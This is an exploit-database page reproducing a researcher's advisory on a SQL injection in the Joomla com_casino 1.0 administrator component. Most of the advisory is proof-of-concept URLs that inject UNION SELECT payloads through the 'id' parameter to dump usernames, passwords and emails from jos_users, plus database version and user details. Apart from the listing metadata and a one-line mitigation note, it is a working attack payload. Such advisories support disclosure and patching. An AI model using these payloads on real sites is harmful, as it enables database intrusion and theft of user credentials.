header-logo
Suggest Exploit
vendor:
Joomla
by:
B-HUNT3|2
3,3
CVSS
LOW
SQL Injection
89
CWE
Product Name: Joomla
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: LocalHost
N/A

Joomla (com_casino) SQL Injection Vulnerabilities

Input var id is vulnerable to SQL Code Injection. It allows an attacker to execute arbitrary SQL queries.

Mitigation:

Input validation should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

[~]>> ...[BEGIN ADVISORY]...

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

[~]>> TITLE: Joomla (com_casino) SQL Injection Vulnerabilities 
[~]>> LANGUAGE: PHP
[~]>> DORK: N/A
[~]>> RESEARCHER: B-HUNT3|2
[~]>> CONTACT: bhunt3r[at_no_spam]gmail[dot_no_spam]com
[~]>> TESTED ON: LocalHost
[~]>> PRE-REQUERIMENTS: Privileged user

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

[~]>> DESCRIPTION: Input var id is vulnerable to SQL Code Injection
[~]>> AFFECTED VERSIONS: Confirmed in 1.0
[~]>> RISK: Low/Medium
[~]>> IMPACT: Execute Arbitrary SQL queries

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

[~]>> PROOFS OF CONCEPT:

[~]>> http://[HOST]/[JOOMLA_PATH]/administrator/index.php?option=com_casino&task=category&id=[SQL]
[~]>> http://[HOST]/[JOOMLA_PATH]/administrator/index.php?option=com_casino&task=player&id=[SQL]

[~]>> http://[HOST]/[JOOMLA_PATH]/administrator/index.php?option=com_casino&task=category&id=-1%27+union+all+select+1,username,password,4,5+from+jos_users/*
[~]>> http://[HOST]/[JOOMLA_PATH]/administrator/index.php?option=com_casino&task=player&id=-1%27+union+all+select+1,2,password,email,@@version,database(),user(),username+from+jos_users/*

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

[~]>> ...[END ADVISORY]...